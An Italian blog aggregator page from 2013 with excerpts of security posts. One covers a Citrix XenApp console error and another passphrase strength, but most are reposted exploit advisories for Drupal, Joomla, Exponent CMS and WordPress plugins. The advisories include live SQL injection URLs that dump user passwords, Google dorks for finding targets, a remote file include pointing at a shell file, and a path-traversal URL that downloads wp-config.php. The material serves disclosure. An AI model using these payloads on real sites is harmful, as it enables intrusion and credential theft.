Il Bloggatore

XenApp: Errore di Discovery su AppCenter dopo il cambio password dell’utente Administrator di dominio

18 maggio 2013 - Fonte: http://www.sysblog.it

Dopo aver cambiato la password dell’utente Administrator di dominio Active Directory, mi sono imbattuto in una problematica che riguarda la corretta apertura della console di gestione Citrix AppCenter. Dopo aver lanciato Citrix AppCenter, il processo di discovery sulla farm XenApp va in errore riportando il seguente messaggio: Errors occurred when using NOMESERVER in the discovery process [...] Articoli correlati:

XenApp 5 su Windows 2008…dominio Active Directory 2008.. e i Roaming Profiles?
href="http://www.sysblog.it/...

Leggi il seguito »

Nessun commento »

Inserito in Citrix, Citrix Systems, Citrix XenApp, configurare, dsmaint, error, Microsoft SQL Server, occurred, process, Security, SYSblog.it, XenApp

La vera password difficile da crackare

18 maggio 2013 - Fonte: http://www.spippolazione.net

https://tech.dropbox.com/2012/04/zxcvbn-realistic-password-strength-estimation/ In soldoni: una password che sembra complessa come Tr0ub4dor&3 è meno complessa di una composta da 4 parole di senso compiuto come armadiocavalloautomobiletrenino che si ricorda più facilmente, poi, magari, per far contenti i sofware che controllano le password quano le create, mettete le iniziali in maiuscolo....

Leggi il seguito »

Nessun commento »

Inserito in appunti, Security, SpippolAzione

Drupal 6.x/7.x Google Authenticator login Access Bypass

18 maggio 2013 - Fonte: http://www.mondounix.com

 
 
    Advisory ID: DRUPAL-SA-CONTRIB-2013-047
    Project: Google Authenticator login (third-party module)
    Version: 6.x, 7.x
    Date: 2013-May-15
    Security risk: Moderately critical
    Exploitable from: Remote
    Vulnerability: Access bypass
 
Description
 
This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. It works with Google's Authenticator app system and support most (if not all) OATH based HOTP/TOTP systems.
Accidental removal of account configuration.
 
In certain scenarios, Google Authenticator login incorrectly determines the user's account name. The...

Leggi il seguito »

Nessun commento »

Inserito in 0day, Bypass, CMS, drupal, exploit, Google Authenticator, linux, LOGIN ACCESS BYPASS, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

Drupal CMS 7.12 Multiple Vulnerabilities

18 maggio 2013 - Fonte: http://www.mondounix.com

# Exploit Title    : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date             : 02-03-2012
# Author           : Ivano Binetti (http://ivanobinetti.com)
# Software link    : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site      : http://drupal.org
# Version          : 7.12 (and lower)
# Tested on        : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID           : 18564 (http://www.exploit-db.com/exploits/18564/)  
# Other Advisory   : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory   : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple...

Leggi il seguito »

Nessun commento »

Inserito in 0day, ADD ADMINISTRATOR, CMS, cross site request forgery, csrf, drupal, exploit, FORCE LOGOUT, linux, MondoUnix, multiple, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

Joomla Discussions SQL Injection

17 maggio 2013 - Fonte: http://www.mondounix.com

# Title     : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author    : Red Security TEAM
# Date      : 17/01/2012
# Risk      : High
# Software  : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example   : 
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get  Tables  Name]
#...

Leggi il seguito »

Nessun commento »

Inserito in 0day, component, DISCUSSIONS, exploit, joomla, linux, MondoUnix, PHP, remote, RSFILES, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

Joomla Component com_s5clanroster Sql Injection Vulnerability

17 maggio 2013 - Fonte: http://www.mondounix.com

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.newone.org/s5-clan-roster-shape5-extensions
####################################################################
===[ Exploit ]===
 
Sql Injection:
==============
 
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]
 
www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users--...

Leggi il seguito »

Nessun commento »

Inserito in 0day, component, COM_S5CLANROSTER, exploit, joomla, linux, MondoUnix, PHP, remote, RSFILES, S5CLANROSTER, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

Joomla x-shop

17 maggio 2013 - Fonte: http://www.mondounix.com

Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
 
--------------------------------------------------------------------------------
#Author: Crackers_Child
 
 
#cont@ct: crackers_child@sibersavascilar.com
 
--------------------------------------------------------------------------------
 
Google Dorks  : allinurl:"/com_x-shop/"
 
------------------------- -------------------------------------------------------
 
Download :  http://mamboxchange.com/frs/?group_id=187&amp;release_id=1047
 
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
 
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
 
 
--------------------------------------------------------------------------------
 
Exploit:
 
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
 
 
--------------------------------------------------------------------------------
 
greets:
 
All...

Leggi il seguito »

Nessun commento »

Inserito in 0day, component, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, X-SHOP

Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection

16 maggio 2013 - Fonte: http://www.mondounix.com

Advisory ID: HTB23154
Product: Exponent CMS
Vendor: Online Innovative Creations
Vulnerable Version(s): 2.2.0 beta 3 and probably prior
Tested Version: 2.2.0 beta 3
Vendor Notification: April 24, 2013 
Vendor Patch: May 3, 2013 
Public Disclosure: May 15, 2013 
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]
CVE References: CVE-2013-3294, CVE-2013-3295
Risk Level: High 
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory...

Leggi il seguito »

Nessun commento »

Inserito in 0day, CMS, exploit, EXPONENT, EXPONENT CMS, lfi, LOCAL FILE INCLUSION, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

WordPress wp-FileManager File Download

16 maggio 2013 - Fonte: http://www.mondounix.com

Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application
 
 
 
Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

...

Leggi il seguito »

Nessun commento »

Inserito in 0day, download, exploit, file, file download, linux, MondoUnix, PHP, Plugin, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, WP-FILEMANAGER

WordPress Newsletter 3.2.6 Cross Site Scripting

16 maggio 2013 - Fonte: http://www.mondounix.com

Wordpress Newsletter Plugin 3.2.6 (alert) Reflected XSS Vulnerability
 
 
Vendor: Stefano Lissa
Product web page: http://wordpress.org/extend/plugins/newsletter/
Affected version: 3.2.6 and bellow
 
Summary: Newsletter is the perfect WordPress plugin for creating
real newsletters and mail marketing system on your WordPress blog.
 
Desc: The plugin suffers from a XSS issue due to a failure to properly
sanitize user-supplied input to the 'alert' GET parameter in the 'page.php'
script. Attackers can exploit this weakness to execute arbitrary HTML
and script code in a user's browser session.
 
 
=======================================================================
/subscription/page.php:
-----------------------
 
70:...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, linux, MondoUnix, Newsletter, PHP, Plugin, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, wordpress, WORDPRESS SECURITY, XSS